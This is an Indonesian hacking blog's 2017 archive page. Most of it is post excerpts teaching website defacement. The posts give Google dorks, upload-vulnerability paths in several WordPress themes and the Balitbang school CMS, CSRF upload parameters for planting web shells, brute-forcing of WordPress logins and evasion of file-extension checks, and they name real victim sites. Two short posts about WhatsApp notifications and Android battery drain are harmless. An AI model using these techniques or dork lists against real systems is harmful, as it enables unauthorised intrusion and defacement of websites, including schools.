Langsung ke konten utama

Postingan

Menampilkan postingan dari 2017

Download E-Book Buku Sakti Hacker

Berikut SS nya Langsung aja ye klik  Disini

Apa ? Blogspot Tim Error Violence Kena Deface ?

Baru baru ini muncul tim baru bernama Error Violence Saya sih antara percaya dan gak percaya ini blogspot kena deface Di link  http://error-violence.blogspot.co.id  bertuliskan Touched By ./CalmCoder ( Itu teman saya ) Kemarin saya dapat kabar dari temen saya klo dia bisa deface blogspot, pas saya tanya " masa sih ? blogspot mana bisa dideface -_-" Dia jawab " Ini buktinya bisa :v ada trik nya dong :*" Saya juga belum tau ini ASLI atau HOAX Untuk link langsung aja klik  http://error-violence.blogspot.co.id Jika ada pertanyaan seputar deface, berita, atau lainnya silahkan ke  https://www.facebook.com/moderncoding.id

Deface Dengan Array Files Shell Upload Vulnerability

Langsung aja ye gausah banyak basa-basi Pertama silahkan dorking dulu di google , dork bisa dilihat  disini dorking image yah ingat :) Silahkan klik image dan kemudian silahkan klik open image in new tab Maka akan jadi seperti ini Disana terlihat ada link http://upload.studioconex.pl/server/php/files/DSCF2150%20ok%20%281%29.jpg Lalu kita coba masukkan exploitnya yaitu site.com/server/php/ Sehingga menjadi http://upload.studioconex.pl/server/php/ Jika Vuln akan tampil kurang lebih seperti ini Silahkan klik gambar untuk memperbesar atau biasanya juga cuman muncul tulisan  {"files":[]} aja , intinya yah sekitaran seperti itu lah , klo not found atau forbidden mendingan tinggalin aja kemudian kita buka csrf nya Disini Masukkan link tadi http://upload.studioconex.pl/server/php/ di target postname ketikkan : files[] Kemudian klik ok terus pilih shell kamu kemudian upload deh  Usahakan pakek minishell yah biar mem...

Deface Wordpress Theme Headway Shell Upload Vulnerability

#-Title: Wordpress Headway Themes Shell Upload Vulnerability #-Author: Anonymously #-Date: 10/27/2015 #- Vendor : headwaythemes. com #- Developer : Clay Griffith #- Link Download :  headwaythemes .com/pricing/ #-Google Dork: inurl:wp-content/ themes/headway-(random) #- Tested on : Trusty Tahr #- Fixed in ?? ========================================================================== ·          Exploit : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php  ·           When Vulnerable  :  /home/localhost/public_html/ CSRF : Disini  Atau  Disini Postname : Filedata Jika Berhasil Keluar Angka 1 Shell Access =>  site/wp-content/uploads/headway/header-uploads/namashell.php

Bypass Jumping Dir Merah

Biasanya ketika defacer udah tanem shell , terus dia mau jumping tapi dir nya merah semua. Mau ditanem shell gabisa , mau edit index gabisa, mau titip file juga gabisa Untuk bahan bahan yang diperlukan silahkan menuju ke  http://www.moderncoding.id/2017/03/adminer-425-download.html Berikut lanngsung aja simak videonya ( klo ditutorialin panjang )  klik ini  Link 1 kalau link utama error klik link dibawah ini Link 2

Adminer 4.2.5 Download

Adminer adalah software yang digunakan untuk memanajemen databases pada website , cocok untuk orang yang suka deface neh Kita cuman butuh file config aja buat login kedalem Langsung aja neh untuk download Disini atau Disini

Deface Dengan WP BruteForce Online Web Exploiter

Tehnik ini merupakan tehnik lama yang dipakai untuk menemukan password secara paksa yang terbukti cukup ampuh sampai saat ini, tehnik ini ini ditunjang dengan kombinasi wordlist anda, jika wordlist anda bagus maka besar kemungkinan anda dapat menemukan password web tersebut Bahan - bahan : Online Web Exploiter Klik Disini  atau   Disini Untuk Wordlist bisa ambil Disini ,  Disini  atau  Disini Langsung aja kita praktekan Pertama kita dorking dulu, dork bisa diambil Disini ,  Disini  atau bisa juga pakai live target Disini kita coba pakek dork yahh dan target kita adalah http://www.needrom.com/wp-login.php ( Lihat Gambar ) Kemudian kita coba masukan username nya dengan : admin dan password bisa terserah anda ( ngawur saja ) Jika vuln akan muncul tulisan  ERROR : The password you entered for the username  admin  is incorrect.  Lihat gambar dibawah ini Langsung saja kita buka website exploiter online nya, ...

WhatsApp Tidak Muncul Pemberitahuan ? Ini Solusinya !

Pernahkah anda mengalami saat saat dimana notifikasi pesan masuk dari whats app anda tidak keluar ? Berikut solusi yang pantas anda coba untuk mengatasinya  Pastikan pemberitahuan WhatsApp tidak dibisukan Cara mengeceknya => Buka WhatsApp, ketuk Lainnya  > pengaturan > pemberitahuan dan pastikan bahwa pesan dan pemberitahuan grup sudah diatur ke Aktif. Buka chat yang ingin Anda terima pemberitahuannya > Lainnya  > info grup atau info dan pastikan bahwa chat tidak dibisukan. Penghemat Baterai Diaktifkan Jika Penghemat Baterai diaktifkan, pemberitahuan tidak akan dikirimkan untuk menghemat baterai telepon. Harap pastikan bahwa mode Penghemat Baterai sudah dimatikan pada Pengaturan Windows Phone > sistem > penghemat baterai. Diatas adalah tips yang bisa anda lakukan untuk mengatasi  WhatsApp Tidak Muncul Pemberitahuan. Terimakasih jangan lupa juga like FansPage kami klik  https://www.facebook.com/moderncoding.id S...

Terungkap ! Ternayata Ini Penyebab HP Android Cepat Panas, Lemot Dan Baterai Cepat Habis !

Di zaman yang serba modern ini, android menjadi salah satu barang yang harus dimiliki oleh setiap orang, namun sadarkah anda bahwa android yang anda beli lama kelamaan performanya akan menurun, cepat panas, dan masa pakai baterai pun semakin pendek. berikut Penyebab HP Android Cepat Panas Dan Baterai Cepat Habis 1. Aplikasi Social Media Aplikasi social media sebenarnya tidak terlalu menguras baterai jika digunakan secara teratur, maksut teratur disini adalah tidak menggunakannya secara terus menerus. Kenapa jika digunakan secara terus menerus ? Jika aplikasi sosmed digunakan secara terus menerus, dia akan memakan memori android anda secara terus menerus selama aplikasi aktif dan akan menyebabkan ponsel android anda cepat panas 2. Multitasking Nah ini nih yang sangat menguras baterai, yaps multitasking atau membuka  banyak aplikasi dalam satu waktu tanpa menutup aplikasi yang tidak dipakai terlebih dahulu. bayangkan saja jika ram anda misalkan 2 gb , and...

Deface Wordpress Themes Qualifire Shell Upload

Mungkin para pemain lama beberapa ada yang tau metode ini, namun ketika saya cek pakek metode ini tadi malam banyak yang masih vuln dan banyak yang bisa disubmit ke mirror. Lumayan kan ? Langsung aja yah ikuti tutor dibawah ini Untuk dork bisa klik http://pastebin.com/Q17V3Xh6  Untuk exploit bisa klik  Disini Untuk CSRF Online bisa klik  Disini Simak tutor berikut Pertama kalian harus dorking dengan dork diatas, bisa juga dengan dorking image (lihat gambar) Langsung saja kita pilih salah satu target >> Klik kanan gambar lalu klik open image atau view image akan jadi seperti ini link yang sekarang : http://senvit.com.ar/wp-content/themes/qualifire/sliders/cycle/cycle1/images/slide2.jpg Kita ubah menjadi : http://senvit.com.ar/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php Vuln = Blank Vuln = Blank Kemudian copy link lalu buka exploiter CSRF online yang sudah saya berikan diatas atau bisa juga kli...

Deface Wordpress Theme Store Shell Upload

Dork :  Crotz Disini Exploiter Online : Crotz Disana Kita anggap kalian sudah dorking menggunakan dork diatas, Dorking nya dengan cara dorking image Kita klik salah satu target lalu klik kanan - open image in new tab ( Lihat Gambar ) Kemudian akan muncul seperti ini Kita hilangkan url dibelakang www.roponesparabautizo.com awalnya www.roponesparabautizo.com/wp-content/uploads/products_img/face_the_fuzz_2.jpg lalu kita buat menjadi seperti ini www.roponesparabautizo.com kemudian klik enter dan akan keluar seperti ini Kemudian kita harus mengetahui theme apa yang digunakan web tersebut dengan cara tambahkan view-source:   didepan url menjadi  view-source:ww.roponesparabautizo.com Maka akan menjadi seperti ini ( yang saya blok adalah theme yang dipakai ) Disini kita mengetahui kalau theme yang digunakan adalah WP Theme Store  Gimana caranya ? itu kan yang saya blog ada tulisan http://www.roponespa...

Deface Website CMS Balitbang [ With New Exploiter ]

Pertama anngap saja kalean udah dorking dan undah dapet target baliitbang Klo belum bisa dorking bisa ke  Sini Dan untuk dork balitbang bisa ke  Sini Disini kita dah nemu target yaitu http:// www.telenikapalembang.sch.id Copy link nya dan buka exploiter nya di bawah ini ( Silahkan gunakan salah satu exploiter dibawah ini, jika salah satu error, bisa gunakan yang lain ) Exploiter 1   Exploiter  2 Kalau link rusak lapor di komen Masukkan link nya sehingga jadi kek gini lihat gambar ini cara caranya , klik sesuai instruksi gambar dan yang terakhir klik lewat sini brade Klik lewat sini brade Ikuti Instruksi gambar dibawah ini  Rename shell anda dulu jadi tgs-ganteng.php5 atau tgs-ganteng.phtml lalu klik simpan dan jika berhasil maka akan seperti ini jadinya ( Keluar nama sekolahnya ) Lalu jika udah berhasil langsung aja klik salah satu link yang dikasih tuh ( nomer 4 ) , klik nya berdasarkan nama shel...

Dork Fresh CMS Balitbang

Ini adalah dork hasil dari kerjasama saya dan temen saya, namun dork ini belum saya selesaikan semua, jadi silahkan terus kunjungi blog ini buar tau updatenya yaa  :)  Juga silahkan share dan bookmark yaa :) inurl:member/daftar.php intext:NAMAKOTA inurl:/sch.id Team balitbang intext:NAMAKOTA intext:"Kamfret Team"sch.id Team Balitbang inurl:/member/daftar.php inurl:"/html/index.php" intext:"Tim Balitbang" inurl:"/html/index.php" intitle:"Selamat Datang" inurl:"/member/" intext:"Tim Balitbang" inurl:"/html/siswa.php?" inurl:"/html/alumni.php?" inurl:"/html/guru.php?" inurl:/member/daftar.php intext:"namakota" inurl:/member/ site:sch.id "selamat datang di komunitas" inurl:/elearning/ "password" site:sch.id inurl:/member/index.php "Tim Balitbang Kemdikbud versi" inurl:/user/index.php "Tim Balitbang Kemdikbud versi" inur...